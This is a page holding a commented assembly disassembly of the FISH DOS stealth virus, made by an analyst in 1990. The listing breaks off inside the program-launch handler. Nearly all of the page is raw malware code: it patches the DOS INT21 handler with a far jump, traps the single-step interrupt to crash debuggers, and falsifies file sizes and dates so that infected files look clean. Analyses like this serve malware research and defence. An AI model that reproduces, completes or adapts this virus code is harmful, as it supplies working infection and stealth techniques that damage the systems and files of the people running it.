Make your own free website on
Prev || Home
;  FISH virus
;  Disassembled December 1990 Thomas E Dell <>
3411:0100 E9FB0D         JMP    0EFE
3411:0103 68F563
                         DB ' is a tiny COM program.',0DH,0AH,'$'
3411:0120 BA0201         MOV    DX,0102 
3411:0123 B409           MOV	AH,09 
3411:0125 CD21           INT	21 
3411:0127 CD20           INT    20
3411:0129 0000000000000000
3411:0131 E9CA0D         JMP    0EFE
;  The first few bytes of the program are saved here, which can
;  contain either the start of the COM, or the ExeHeader:
3411:0134 EB1E           JMP    $+1E
                         DB 'This is a tiny COM program',0
;  Call previous INT21 handler.
3411:0151 9C             PUSHF
3411:0152 2EFF1E350E     CALL FAR CS:[0E35]
3411:0157 C3             RET
                        DB      0,'COD'
;  COD1 -- Save all the registers on the stack
3411:015C 2E8F06EA0E     POP    CS:[0EEA]       ; Save return address
3411:0161 9C             PUSHF	 
3411:0162 50             PUSH	AX 
3411:0163 53             PUSH	BX 
3411:0164 51             PUSH	CX 
3411:0165 52             PUSH	DX 
3411:0166 56             PUSH	SI 
3411:0167 57             PUSH	DI 
3411:0168 1E             PUSH	DS 
3411:0169 06             PUSH	ES 
3411:016A 2EFF26EA0E     JMP    CS:[0EEA]       ; Return to caller
;  COD2 -- Restore all registers
3411:016F 2E8F06EA0E     POP    CS:[0EEA]       ; Save return address
3411:0174 07             POP	ES 
3411:0175 1F             POP	DS 
3411:0176 5F             POP	DI 
3411:0177 5E             POP	SI 
3411:0178 5A             POP	DX 
3411:0179 59             POP	CX 
3411:017A 5B             POP	BX 
3411:017B 58             POP	AX 
3411:017C 9D             POPF	 
3411:017D 2EFF26EA0E     JMP    CS:[0EEA]       ; Return to caller
                        DB      'SHARK'
;  SHARK1 -- restore all registers using internal stack
3411:0187 2E8926570F     MOV    CS:[0F57],SP            ; save SP
3411:018C 2E8C16590F     MOV    CS:[0F59],SS            ; save SS
3411:0191 0E             PUSH	CS 
3411:0192 17             POP    SS                      ; internal SS
3411:0193 2E8B265B0F     MOV    SP,CS:[0F5B]            ; internal SP
3411:0198 2EE8D3FF       CALL   016F                    ; COD2 - restore regs
3411:019C 2E8E16590F     MOV    SS,CS:[0F59]            ; restore SS
3411:01A1 2E89265B0F     MOV    CS:[0F5B],SP            ; internal SP
3411:01A6 2E8B26570F     MOV    SP,CS:[0F57]            ; restore SP
3411:01AB C3             RET
;  SHARK2 -- save all registers using internal stack
3411:01AC 2E8926570F     MOV    CS:[0F57],SP            ; save SP
3411:01B1 2E8C16590F     MOV    CS:[0F59],SS            ; save SS
3411:01B6 0E             PUSH	CS 
3411:01B7 17             POP    SS                      ; internal SS
3411:01B8 2E8B265B0F     MOV    SP,CS:[0F5B]            ; internal SP
3411:01BD 2EE89BFF       CALL   015C                    ; COD1 - save regs
3411:01C1 2E8E16590F     MOV    SS,CS:[0F59]            ; restore SS
3411:01C6 2E89265B0F     MOV    CS:[0F5B],SP            ; internal SP
3411:01CB 2E8B26570F     MOV    SP,CS:[0F57]            ; restore SP
3411:01D0 C3             RET	 
3411:01D1 8C
;  SHARK3 - swap the JMP xxxx:yyy and the real INT21 code. This must
;  be setup before attempting to execute the previous INT21.
3411:01D2 BE4B0E         MOV    SI,0E4B
3411:01D5 2EC43E350E     LES	DI,CS:[0E35] 
3411:01DA 0E             PUSH	CS 
3411:01DB 1F             POP	DS 
3411:01DC FC             CLD	 
3411:01DD B90500         MOV    CX,0005                 ; 5 bytes
3411:01E0 AC             LODSB	 
3411:01E1 268605         XCHG	AL,ES:[DI] 
3411:01E4 8844FF         MOV	[SI-01],AL 
3411:01E7 47             INC	DI 
3411:01E8 E2F6           LOOP   01E0
;  Note: the "C" in CARP below is a RET..!
                        DB      'CARP'
;  CARP1 -- Intercept single step interrupt. Anyway this causes the
;  system to crash when attempting to follow FISH with DEBUG.
3411:01EF B001           MOV    AL,01           ; INT01, single step
3411:01F1 0E             PUSH   CS
3411:01F2 1F             POP	DS 
3411:01F3 BAB70C         MOV    DX,0CB7         ; INT01 routine, at 0D9B
3411:01F6 E80100         CALL   01FA            ; CARP2 - set interrupt
3411:01F9 C3             RET
;  CARP2 - Set an interrupt by manipulating the 0000:0000 table directly
3411:01FA 06             PUSH	ES 
3411:01FB 53             PUSH	BX 
3411:01FC 33DB           XOR	BX,BX 
3411:01FE 8EC3           MOV	ES,BX 
3411:0200 8AD8           MOV	BL,AL 
3411:0202 D1E3           SHL	BX,1 
3411:0204 D1E3           SHL	BX,1 
3411:0206 268917         MOV	ES:[BX],DX 
3411:0209 268C5F02       MOV	ES:[BX+02],DS 
3411:020D 5B             POP	BX 
3411:020E 07             POP	ES 
3411:020F C3             RET
;  CARP3 - Get an interrupt from the segment 0000:0000 table
3411:0210 1E             PUSH	DS 
3411:0211 56             PUSH	SI 
3411:0212 33F6           XOR	SI,SI 
3411:0214 8EDE           MOV	DS,SI 
3411:0216 32E4           XOR	AH,AH 
3411:0218 8BF0           MOV	SI,AX 
3411:021A D1E6           SHL	SI,1 
3411:021C D1E6           SHL	SI,1 
3411:021E 8B1C           MOV	BX,[SI] 
3411:0220 8E4402         MOV	ES,[SI+02] 
3411:0223 5E             POP	SI 
3411:0224 1F             POP	DS 
3411:0225 C3             RET
                        DB      'BASS'
;  BASS1 -- Continue the setup procedure.
3411:022A E8B002         CALL   04DD            ; SPOOF
3411:022D B9
3411:022E E8560A         CALL   0C87            ; TUNA2
3411:0231 8E
3411:0232 2EA3E30E       MOV    CS:[0EE3],AX
3411:0236 B452           MOV    AH,52           ; Get list of lists
3411:0238 2EC7065B0F0010 MOV	Word Ptr CS:[0F5B],1000 
3411:023F 2E8C1E450E     MOV	CS:[0E45],DS 
3411:0244 E8800B         CALL   0DC7            ; SPOOF
3411:0247 EB
3411:0248 CD21           INT    21
3411:024A 268B47FE       MOV    AX,ES:[BX-02]
3411:024E 2EA3470E       MOV    CS:[0E47],AX
3411:0252 0E             PUSH	CS 
3411:0253 1F             POP	DS 
3411:0254 E8300A         CALL   0C87            ; TUNA2
3411:0257 A1
3411:0258 B021           MOV    AL,21           ; 21, DOS interrupt
3411:025A E8B3FF         CALL   0210            ; CARP3 - get interrupt
3411:025D 8C062F0E       MOV	[0E2F],ES 
3411:0261 891E2D0E       MOV    [0E2D],BX
;  Disable single step interrupt
3411:0265 BAB70C         MOV    DX,0CB7         ; INT01 routine, at 0D9B
3411:0268 B001           MOV	AL,01 
3411:026A C606500E00     MOV	Byte Ptr [0E50],00 
3411:026F E888FF         CALL   01FA            ; CARP2 - set interrupt
3411:0272 9C             PUSHF	 
3411:0273 58             POP	AX 
3411:0274 0D0001         OR	AX,0100 
3411:0277 50             PUSH	AX 
3411:0278 9D             POPF	 
3411:0279 9C             PUSHF	 
3411:027A B461           MOV    AH,61
3411:027C FF1E2D0E       CALL	FAR [0E2D] 
3411:0280 9C             PUSHF	 
3411:0281 58             POP	AX 
3411:0282 25FFFE         AND	AX,FEFF 
3411:0285 50             PUSH	AX 
3411:0286 9D             POPF	 
3411:0287 E8E101         CALL	046B 
3411:028A A3
;  INT21 is never intercepted directly. Instead, the current
;  handler has a far jmp overwritten on top of it. The JMP written
;  points to the TROUT2 routine, our INT21 "tsr".
3411:028B C43E2D0E       LES    DI,[0E2D]
3411:028f 8C06370E       MOV    [0E37],ES
3411:0293 C6064B0EEA     MOV    Byte Ptr [0E4B],EA      ; jmp xxxx:yyyy
3411:0298 C7064C0E5B0D   MOV    Word Ptr [0E4C],0D5B    ; yyyy
3411:029E 893E350E       MOV	[0E35],DI 
3411:02A2 8C0E4E0E       MOV    [0E4E],CS               ; xxxx
3411:02A6 E80700         CALL	02B0 
3411:02A9 E826FF         CALL   01D2            ; SHARK3
3411:02AC E8170A         CALL   0CC6            ; SPOOF
3411:02AF 89
3411:02B0 B02F           MOV    AL,2F           ; int 2F, print spooler, why?
3411:02B2 E85BFF         CALL   0210            ; CARP3 - get interrupt
3411:02B5 8CC3           MOV    BX,ES
3411:02B8 2E391E470E     CMP    CS:[0E47],BX
3411:02BC 731C           JNB	02DA 
3411:02BE E83F0A         CALL	0D00 
3411:02C1 2E8E1E2F0E     MOV	DS,CS:[0E2F] 
3411:02C6 2EFF362D0E     PUSH	CS:[0E2D] 
3411:02CB 5A             POP	DX 
3411:02CC B013           MOV    AL,13           ; BIOS disk access, INT13
3411:02CE E829FF         CALL   01FA            ; CARP2 - set interrupt
3411:02D1 33DB           XOR	BX,BX 
3411:02D3 8EDB           MOV	DS,BX 
3411:02D5 C606750402     MOV	Byte Ptr [0475],02 
3411:02DA C3             RET
                DB      ' FISH VIRUS #6 - EACH DIFF - BONN 2/90 '
;  The following are intended to be printed. Version letters?
                DB      ''~knzyvo}''
                DB      '$'
3411:030D E8C2FE         CALL   01D2                    ; SHARK3
3411:0310 2E8C0E4E0E     MOV    CS:[0E4E],CS
3411:0315 E8BAFE         CALL   01D2                    ; SHARK3
3411:0318 0E             PUSH	CS 
3411:0319 1F             POP	DS 
3411:031A 1E             PUSH	DS 
3411:031B 07             POP	ES 
3411:031C A1450E         MOV	AX,[0E45] 
3411:031F 8EC0           MOV	ES,AX 
3411:0321 26C5160A00     LDS	DX,ES:[000A] 
3411:0326 8ED8           MOV	DS,AX 
3411:0328 051000         ADD	AX,0010 
3411:032B 2E01061A00     ADD	CS:[001A],AX 
3411:0330 2E803E200000   CMP    Byte Ptr CS:[0020],00   ; COM/EXE flag
3411:0336 FB             STI	 
3411:0337 7524           JNZ	035D 
3411:0339 2EA10400       MOV	AX,CS:[0004] 
3411:033D A30001         MOV	[0100],AX 
3411:0340 2EA10600       MOV    AX,CS:[0006]
3411:0344 A30201         MOV	[0102],AX 
3411:0347 2EA10800       MOV	AX,CS:[0008] 
3411:034B A30401         MOV	[0104],AX 
3411:034E 2EFF36450E     PUSH	CS:[0E45] 
3411:0353 33C0           XOR	AX,AX 
3411:0355 FEC4           INC	AH 
3411:0357 50             PUSH	AX 
3411:0358 2EA1E30E       MOV	AX,CS:[0EE3] 
3411:035C CB             RETF
3411:035D 2E01061200     ADD	CS:[0012],AX 
3411:0362 2EA1E30E       MOV	AX,CS:[0EE3] 
3411:0366 2E8B261400     MOV	SP,CS:[0014] 
3411:036B 2E8E161200     MOV	SS,CS:[0012] 
3411:0370 2EFF2E1800     JMP    FAR CS:[0018]
                        DB      'TROUT'
;  Startup and change code segment.
;  This routine is executed right after the virus has been decrypted.
3411:037A 33E4           XOR    SP,SP 
3411:037C E80000         CALL	037F 
3411:037F 89C5           MOV    BP,AX           ; Save AX
3411:0381 8CC8           MOV    AX,CS           ; AX = segment
3411:0383 BB1000         MOV	BX,0010 
3411:0386 F7E3           MUL    BX              ; AX = segment shifted left
3411:0388 59             POP    CX              ; CX = 037F
3411:0389 81E94F02       SUB    CX,024F         ; CX = 0130
3411:038D 03C1           ADD	AX,CX 
3411:038F 83D200         ADC	DX,+00 
3411:0392 F7F3           DIV    BX              ; AX = seg + xxxx
3411:0394 50             PUSH	AX 
3411:0395 B8FA00         MOV	AX,00FA 
3411:0398 50             PUSH	AX 
3411:0399 89E8           MOV    AX,BP           ; Restore AX
3411:039B CB             RETF                   ; To BASS1 routine
;  I N T 2 1
;  TROUT2 -- INT21 processing. Come here right after
;  decrypting memory if required.
3411:039C E8CC00         CALL   046B            ; SPOOF
3411:039F CD
3411:03A0 E8240A         CALL   0DC7            ; SPOOF
3411:03A3 CB
3411:03A4 53             PUSH	BX 
3411:03A5 8BDC           MOV	BX,SP 
3411:03A7 368B5F06       MOV	BX,SS:[BX+06] 
3411:03AB 2E891EB30E     MOV	CS:[0EB3],BX 
3411:03B0 5B             POP    BX
3411:03B1 55             PUSH   BP
3411:03B2 89E5           MOV	BP,SP 
3411:03B4 E8D008         CALL   0C87            ; TUNA2
3411:03B7 A3
;  Swap back "IN" the first five bytes of the proper INT21 handler.
3411:03B8 E8F1FD         CALL   01AC            ; SHARK2 - save regs internal
3411:03BB E814FE         CALL   01D2            ; SHARK3
3411:03BE E8C6FD         CALL   0187            ; SHARK1 - rest regs internal
3411:03C1 E898FD         CALL   015C            ; COD1 - save registers
3411:03C4 E8C008         CALL   0C87            ; TUNA2
3411:03C7 88
;  Check the INT21 function number. This uses diversionary
;  tactics (random bytes) to prevent disassembly.
3411:03C8 80FC0F         CMP    AH,0F           ; Open file with FCB
2FF2:03CB 7504           JNZ    03D1
2FF2:03CD E9E900         JMP    04B9
2FF2:03D0 B8
2FF2:03D1 80FC11         CMP    AH,11           ; First match FCB
2FF2:03D4 7504           JNZ    03DA
2FF2:03D6 E99B00         JMP    0474
2FF2:03D9 A1
2FF2:03DA 80FC12         CMP    AH,12           ; Next match FCB
2FF2:03DD 7504           JNZ    03E3
2FF2:03DF E99200         JMP    0474
2FF2:03E2 89
2FF2:03E3 80FC14         CMP    AH,14           ; Sequential read
2FF2:03E6 7504           JNZ    03EC
2FF2:03E8 E90901         JMP    04F4
2FF2:03EB EB
2FF2:03EC 80FC21         CMP    AH,21           ; Random read
2FF2:03EF 7504           JNZ    03F5
2FF2:03F1 E9F400         JMP    04E8
2FF2:03F4 8C
2FF2:03F5 80FC23         CMP    AH,23           ; Get file size
2FF2:03F8 7504           JNZ    03FE
2FF2:03FA E98401         JMP    0581
2FF2:03FD A3
2FF2:03FE 80FC27         CMP    AH,27           ; Random block read
2FF2:0401 7504           JNZ    0407
2FF2:0403 E9E000         JMP    04E6
2FF2:0406 EB
2FF2:0407 80FC3D         CMP    AH,3D           ; Open file
2FF2:040A 7504           JNZ    0410
2FF2:040C E9C601         JMP    05D5
2FF2:040F FF
2FF2:0410 80FC3E         CMP    AH,3E           ; Close file
2FF2:0413 7504           JNZ    0419
2FF2:0415 E90102         JMP    0619
2FF2:0418 A1
2FF2:0419 80FC3F         CMP    AH,3F           ; Read file or device
2FF2:041C 7504           JNZ    0422
2FF2:041E E97D07         JMP    0B9E
2FF2:0421 88
2FF2:0422 80FC42         CMP    AH,42           ; Move file pointer
2FF2:0425 7504           JNZ    042B
2FF2:0427 E94207         JMP    0B6C
2FF2:042A 8C
2FF2:042B 80FC4B         CMP    AH,4B           ; Launch
2FF2:042E 7504           JNZ    0434
2FF2:0430 E91C02         JMP    064F
2FF2:0433 EB
2FF2:0434 80FC4E         CMP    AH,4E           ; Search first match
2FF2:0437 7504           JNZ    043D
2FF2:0439 E95308         JMP    0C8F
2FF2:043C 89
2FF2:043D 80FC4F         CMP    AH,4F           ; Search next match
2FF2:0440 7504           JNZ    0446
2FF2:0442 E94A08         JMP    0C8F
2FF2:0445 8E
2FF2:0446 80FC57         CMP    AH,57           ; Get/set file date + time
2FF2:0449 7503           JNZ    044E
2FF2:044B E9CF06         JMP    0B1D
2FF2:044E E95709         JMP    0DA8
2FF2:0451 EB
;  Swap "OUT" the first five bytes of the original INT21 handler,
;  and install the FAR JMP to our INT21 TSR.
2FF2:0452 E87209         CALL   0DC7            ; SPOOF
3411:0455 A1
3411:0456 E853FD         CALL   01AC            ; SHARK2 - save regs internal
3411:0459 E876FD         CALL   01D2            ; SHARK3
3411:045C E828FD         CALL   0187            ; SHARK1 - rest regs internal
3411:045F 89E5           MOV	BP,SP 
3411:0461 2EFF36B30E     PUSH	CS:[0EB3] 
3411:0466 8F4606         POP	[BP+06] 
3411:0469 5D             POP	BP 
3411:046A CF             IRET	 
3411:046B 2EFF06310E     INC	Word Ptr CS:[0E31] 
3411:0470 E91408         JMP    0C87            ; TUNA2
3411:0473 A1                                    ; filler, no reason
;  I N T 2 1 / AH = 11,12 -- First & Next match with FCB
3411:0474 E8F8FC         CALL   016F            ; COD2 - restore registers
3411:0477 E8D7FC         CALL   0151            ; Call previous INT21
3411:047A 0AC0           OR     AL,AL
3411:047C 75D4           JNZ    0452            ; No matches found
3411:047E E8DBFC         CALL   015C            ; COD1 - save registers
3411:0481 E8C101         CALL   0645            ; Get DTA address
3411:0484 B000           MOV	AL,00 
3411:0486 803FFF         CMP	Byte Ptr [BX],FF 
3411:0489 7506           JNZ	0491 
3411:048B 8A4706         MOV	AL,[BX+06] 
3411:048E 83C307         ADD	BX,+07 
3411:0491 2E2006F00E     AND    CS:[0EF0],AL
;  If from the FCB the file appears to be infected, subtract
;  the length of the virus, E00, from the reported length.
3411:0496 F6471A80       TEST	Byte Ptr [BX+1A],80 
3411:049A 7415           JZ	04B1 
3411:049C 806F1AC8       SUB    Byte Ptr [BX+1A],C8     ; 100 years
3411:04A0 2E803EF00E00   CMP	Byte Ptr CS:[0EF0],00 
3411:04A6 7509           JNZ	04B1 
3411:04A8 816F1D000E     SUB    Word Ptr [BX+1D],0E00   ; Length of virus
3411:04AD 835F1F00       SBB    Word Ptr [BX+1F],+00
3411:04B1 E8BBFC         CALL   016F            ; COD2 - restore registers
3411:04B4 EB9C           JMP	0452 
                DB      'FIN'
;  I N T 2 1 / AH = 0F -- Open with FCB
3411:04B9 E8B3FC         CALL   016F            ; COD2 - restore registers
3411:04BC E892FC         CALL   0151            ; Call INT21 to open file
3411:04BF E89AFC         CALL   015C            ; COD1 - save registers
3411:04C2 0AC0           OR     AL,AL
3411:04C4 75EB           JNZ    04B1            ; Unsuccessful
;  Diddle with the FCB to indicate "true" size of infected files
3411:04C6 89D3           MOV	BX,DX 
3411:04C8 F6471580       TEST   Byte Ptr [BX+15],80     ; Infected?
3411:04CC 74E3           JZ	04B1 
3411:04CE 806F15C8       SUB    Byte Ptr [BX+15],C8     ; 100 years
3411:04D2 816F10000E     SUB    Word Ptr [BX+10],0E00   ; Length of virus
3411:04D7 805F1200       SBB	Byte Ptr [BX+12],00 
3411:04DB EBD4           JMP    04B1
3411:04DD 2EFF0E310E     DEC	Word Ptr CS:[0E31] 
3411:04E2 E9A207         JMP    0C87            ; Spoof with TUNA2
3411:04E5 A3
;  I N T 2 1 / AH = 27 -- Random block read
3411:04E6 E31B           JCXZ   0503
;  I N T 2 1 / AH = 21 -- Random read
3411:04E8 89D3           MOV	BX,DX 
3411:04EA 8B7721         MOV	SI,[BX+21] 
3411:04ED 0B7723         OR	SI,[BX+23] 
3411:04F0 7511           JNZ	0503 
3411:04F2 EB0A           JMP    04FE
;  I N T 2 1 / AH = 14 -- Sequential read
3411:04F4 89D3           MOV	BX,DX 
3411:04F6 8B470C         MOV	AX,[BX+0C] 
3411:04F9 0A4720         OR	AL,[BX+20] 
3411:04FC 7505           JNZ	0503 
3411:04FE E8E304         CALL   09E4            ; PIKE2
3411:0501 7303           JNB	0506 
3411:0503 E948FF         JMP	044E 
3411:0506 E866FC         CALL   016F            ; COD2 - restore registers
3411:0509 E850FC         CALL   015C            ; COD1 - save registers
3411:050C E842FC         CALL	0151 
3411:050F 894EF8         MOV	[BP-08],CX 
3411:0512 8946FC         MOV	[BP-04],AX 
3411:0515 1E             PUSH	DS 
3411:0516 52             PUSH	DX 
3411:0517 E82B01         CALL   0645            ; Get DTA address
3411:051A 837F1401       CMP	Word Ptr [BX+14],+01 
3411:051E 741B           JZ     053B            ; MUSKY
3411:0520 8B07           MOV	AX,[BX] 
3411:0522 034702         ADD	AX,[BX+02] 
3411:0525 53             PUSH	BX 
3411:0526 8B5F04         MOV	BX,[BX+04] 
3411:0529 F7D3           NOT	BX 
3411:052B 01D8           ADD	AX,BX 
3411:052D 5B             POP	BX 
3411:052E 740B           JZ     053B            ; MUSKY
3411:0530 83C404         ADD	SP,+04 
3411:0533 E97BFF         JMP    04B1
                        DB      'MUSKY'
;  A musky is a large North American Pike that can
;  weigh as much as 80 pounds.
3411:053B 5A             POP	DX 
3411:053C 1F             POP	DS 
3411:053D 89D6           MOV	SI,DX 
3411:053F 0E             PUSH	CS 
3411:0540 07             POP	ES 
3411:0541 B92500         MOV	CX,0025 
3411:0544 BFB50E         MOV	DI,0EB5 
3411:0547 F3             REPZ	
3411:0548 A4             MOVSB	 
3411:0549 BFB50E         MOV	DI,0EB5 
3411:054C 0E             PUSH	CS 
3411:054D 1F             POP	DS 
3411:054E 8B5512         MOV	DX,[DI+12] 
3411:0551 8B4510         MOV	AX,[DI+10] 
3411:0554 050F0E         ADD	AX,0E0F 
3411:0557 83D200         ADC	DX,+00 
3411:055A 25F0FF         AND	AX,FFF0 
3411:055D 895512         MOV	[DI+12],DX 
3411:0560 894510         MOV	[DI+10],AX 
3411:0563 2DFC0D         SUB	AX,0DFC 
3411:0566 83DA00         SBB	DX,+00 
3411:0569 895523         MOV	[DI+23],DX 
3411:056C 894521         MOV	[DI+21],AX 
3411:056F B91C00         MOV	CX,001C 
3411:0572 C7450E0100     MOV    Word Ptr [DI+0E],0001
3411:0577 B427           MOV    AH,27           ; Random block read
3411:0579 89FA           MOV	DX,DI 
3411:057B E8D3FB         CALL	0151 
3411:057E E930FF         JMP    04B1
;  I N T 2 1 / AH = 23 -- Get file size
3411:0581 0E             PUSH	CS 
3411:0582 07             POP	ES 
3411:0583 BFB50E         MOV	DI,0EB5 
3411:0586 B92500         MOV	CX,0025 
3411:0589 89D6           MOV	SI,DX 
3411:058B F3             REPZ	
3411:058C A4             MOVSB	 
3411:058D 1E             PUSH	DS 
3411:058E 52             PUSH	DX 
3411:058F 0E             PUSH	CS 
3411:0590 1F             POP	DS 
3411:0591 B40F           MOV    AH,0F           ; open file with FCB
3411:0593 BAB50E         MOV	DX,0EB5 
3411:0596 E8B8FB         CALL   0151
3411:0599 B410           MOV    AH,10           ; close file with FCB
3411:059B E8B3FB         CALL   0151
3411:059E F606CA0E80     TEST	Byte Ptr [0ECA],80 
3411:05A3 5E             POP	SI 
3411:05A4 1F             POP	DS 
3411:05A5 742B           JZ	05D2 
3411:05A7 2EC41EC50E     LES	BX,CS:[0EC5] 
3411:05AC 8CC0           MOV	AX,ES 
3411:05AE 81EB000E       SUB    BX,0E00         ; Length of virus
3411:05B2 1D0000         SBB	AX,0000 
3411:05B5 33D2           XOR	DX,DX 
3411:05B7 2E8B0EC30E     MOV	CX,CS:[0EC3] 
3411:05BC 49             DEC	CX 
3411:05BD 01CB           ADD	BX,CX 
3411:05BF 150000         ADC	AX,0000 
3411:05C2 41             INC	CX 
3411:05C3 F7F1           DIV	CX 
3411:05C5 894423         MOV	[SI+23],AX 
3411:05C8 92             XCHG	AX,DX 
3411:05C9 93             XCHG	AX,BX 
3411:05CA F7F1           DIV	CX 
3411:05CC 894421         MOV	[SI+21],AX 
3411:05CF E9DFFE         JMP	04B1 
3411:05D2 E979FE         JMP    044E
;  I N T 2 1 / AH = 3D -- Open file
3411:05D5 E86C04         CALL   0A44            ; MACKEREL2
3411:05D8 E81504         CALL   09F0            ; PIKE3 -- process filename
3411:05DB 7239           JB	0616 
3411:05DD 2E803EA20E00   CMP	Byte Ptr CS:[0EA2],00 
3411:05E3 7431           JZ	0616 
3411:05E5 E86904         CALL   0A51            ; MACKEREL3
3411:05E8 83FBFF         CMP	BX,-01 
3411:05EB 7429           JZ	0616 
3411:05ED 2EFE0EA20E     DEC	Byte Ptr CS:[0EA2] 
3411:05F2 0E             PUSH	CS 
3411:05F3 07             POP	ES 
3411:05F4 B91400         MOV	CX,0014 
3411:05F7 BF520E         MOV	DI,0E52 
3411:05FA 33C0           XOR	AX,AX 
3411:05FC F2             REPNZ	
3411:05FD AF             SCASW	 
3411:05FE 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:0602 268945FE       MOV	ES:[DI-02],AX 
3411:0606 26895D26       MOV	ES:[DI+26],BX 
3411:060A 895EFC         MOV	[BP-04],BX 
3411:060D 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:0613 E99BFE         JMP	04B1 
3411:0616 E935FE         JMP    044E
;  I N T 2 1 / AH = 3E -- Close file or device
3411:0619 0E             PUSH	CS 
3411:061A 07             POP	ES 
3411:061B E82604         CALL   0A44            ; MACKEREL2
3411:061E B91400         MOV	CX,0014 
3411:0621 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:0625 BF520E         MOV	DI,0E52 
3411:0628 F2             REPNZ	
3411:0629 AF             SCASW	 
3411:062A 7516           JNZ	0642 
3411:062C 263B5D26       CMP	BX,ES:[DI+26] 
3411:0630 75F6           JNZ	0628 
3411:0632 26C745FE0000   MOV	Word Ptr ES:[DI-02],0000 
3411:0638 E81702         CALL	0852 
3411:063B 2EFE06A20E     INC	Byte Ptr CS:[0EA2] 
3411:0640 EBCB           JMP	060D 
3411:0642 E909FE         JMP    044E
;  Get DTA address
3411:0645 B42F           MOV    AH,2F           ; Get DTA
3411:0647 06             PUSH	ES 
3411:0648 E806FB         CALL	0151 
3411:064B 06             PUSH	ES 
3411:064C 1F             POP	DS 
3411:064D 07             POP	ES 
3411:064E C3             RET
;  I N T 2 1 / AH = 4B - LAUNCH
3411:064F 0AC0           OR     AL,AL
3411:0651 7403           JZ     0656            ; Load + execute
3411:0653 E95601         JMP    07AC            ; Just load -- SOLE2
;  INT21, Function 4B00, Load + Execute
3411:0656 1E             PUSH	DS 
3411:0657 52             PUSH	DX 
3411:0658 2E8C06260E     MOV	CS:[0E26],ES 
3411:065D 2E891E240E     MOV	CS:[0E24],BX 
3411:0662 2EC536240E     LDS	SI,CS:[0E24] 
3411:0667 B90E00         MOV	CX,000E 
3411:066A BFF10E         MOV	DI,0EF1 
3411:066D 0E             PUSH	CS 
3411:066E 07             POP	ES 
3411:066F F3             REPZ	
3411:0670 A4             MOVSB	 
3411:0671 5E             POP	SI 
3411:0672 1F             POP	DS 
3411:0673 B95000         MOV	CX,0050 
3411:0676 BF070F         MOV	DI,0F07 
3411:0679 F3             REPZ	
3411:067A A4             MOVSB	 
3411:067B BBFFFF         MOV	BX,FFFF 
3411:067E E8EEFA         CALL   016F            ; COD2 - restore registers
3411:0681 5D             POP	BP 
3411:0682 2E8F06E60E     POP	CS:[0EE6] 
3411:0687 2E8F06E80E     POP	CS:[0EE8] 
3411:068C 2E8F06B30E     POP	CS:[0EB3] 
3411:0691 0E             PUSH	CS 
3411:0692 B8014B         MOV    AX,4B01         ; Load but don't execute
3411:0695 07             POP    ES              ; Segment of parameter block
3411:0696 9C             PUSHF	 
3411:0697 BBF10E         MOV    BX,0EF1         ; Offset of parameter block
3411:069A 2EFF1E350E     CALL   FAR CS:[0E35]   ; Previous INT21 handler
3411:069F 7320           JNB	06C1 
3411:06A1 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:06A7 2EFF36B30E     PUSH	CS:[0EB3] 
3411:06AC 2EFF36E80E     PUSH	CS:[0EE8] 
3411:06B1 2EFF36E60E     PUSH	CS:[0EE6] 
3411:06B6 55             PUSH	BP 
3411:06B7 2EC41E240E     LES	BX,CS:[0E24] 
3411:06BC 89E5           MOV	BP,SP 
3411:06BE E991FD         JMP	0452 
3411:06C1 E88003         CALL   0A44            ; MACKEREL2
3411:06C4 0E             PUSH	CS 
3411:06C5 07             POP	ES 
3411:06C6 B91400         MOV	CX,0014 
3411:06C9 BF520E         MOV	DI,0E52 
3411:06CC 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:06D0 F2             REPNZ	
3411:06D1 AF             SCASW	 
3411:06D2 750D           JNZ	06E1 
3411:06D4 26C745FE0000   MOV	Word Ptr ES:[DI-02],0000 
3411:06DA 2EFE06A20E     INC	Byte Ptr CS:[0EA2] 
3411:06DF EBEB           JMP    06CC
3411:06E1 2EC536030F     LDS    SI,CS:[0F03]
3411:06E6 83FE01         CMP	SI,+01 
3411:06E9 7534           JNZ	071F 
3411:06EB 8B161A00       MOV	DX,[001A] 
3411:06EF 83C210         ADD	DX,+10 
3411:06F2 B451           MOV    AH,51           ; Get PSP segment
3411:06F4 E85AFA         CALL	0151 
3411:06F7 03D3           ADD	DX,BX 
3411:06F9 2E8916050F     MOV	CS:[0F05],DX 
3411:06FE FF361800       PUSH	[0018] 
3411:0702 2E8F06030F     POP	CS:[0F03] 
3411:0707 031E1200       ADD	BX,[0012] 
3411:070B 83C310         ADD	BX,+10 
3411:070E 2E891E010F     MOV	CS:[0F01],BX 
3411:0713 FF361400       PUSH	[0014] 
3411:0717 2E8F06FF0E     POP	CS:[0EFF] 
3411:071C E92800         JMP    0747
3411:071F 8B04           MOV	AX,[SI] 
3411:0721 034402         ADD	AX,[SI+02] 
3411:0724 53             PUSH	BX 
3411:0725 8B5C04         MOV	BX,[SI+04] 
3411:0728 F7D3           NOT	BX 
3411:072A 01D8           ADD	AX,BX 
3411:072C 5B             POP	BX 
3411:072D 7461           JZ     0790            ; SOLE1
3411:072F 0E             PUSH	CS 
3411:0730 1F             POP	DS 
3411:0731 BA070F         MOV	DX,0F07 
3411:0734 E8B902         CALL   09F0            ; PIKE3 - process filename
3411:0737 E81703         CALL   0A51            ; MACKEREL3
3411:073A 2EFE06EF0E     INC	Byte Ptr CS:[0EEF] 
3411:073F E81001         CALL	0852 
3411:0742 2EFE0EEF0E     DEC	Byte Ptr CS:[0EEF] 
3411:0747 B451           MOV    AH,51           ; Get PSP segment
3411:0749 E805FA         CALL	0151 
3411:074C E85DFA         CALL   01AC            ; SHARK2 - save regs internal
3411:074F E880FA         CALL   01D2            ; SHARK3
3411:0752 E832FA         CALL   0187            ; SHARK1 - rest regs internal
3411:0755 8EDB           MOV	DS,BX 
3411:0757 8EC3           MOV	ES,BX 
3411:0759 2EFF36B30E     PUSH	CS:[0EB3] 
3411:075E 2EFF36E80E     PUSH	CS:[0EE8] 
3411:0763 2EFF36E60E     PUSH	CS:[0EE6] 
3411:0768 8F060A00       POP	[000A] 
3411:076C 8F060C00       POP	[000C] 
3411:0770 1E             PUSH	DS 
3411:0771 B022           MOV    AL,22           ; DOS terminate
3411:0773 C5160A00       LDS	DX,[000A] 
3411:0777 E880FA         CALL   01FA            ; CARP2 - set interrupt
3411:077A 1F             POP	DS 
3411:077B 9D             POPF	 
3411:077C 58             POP	AX 
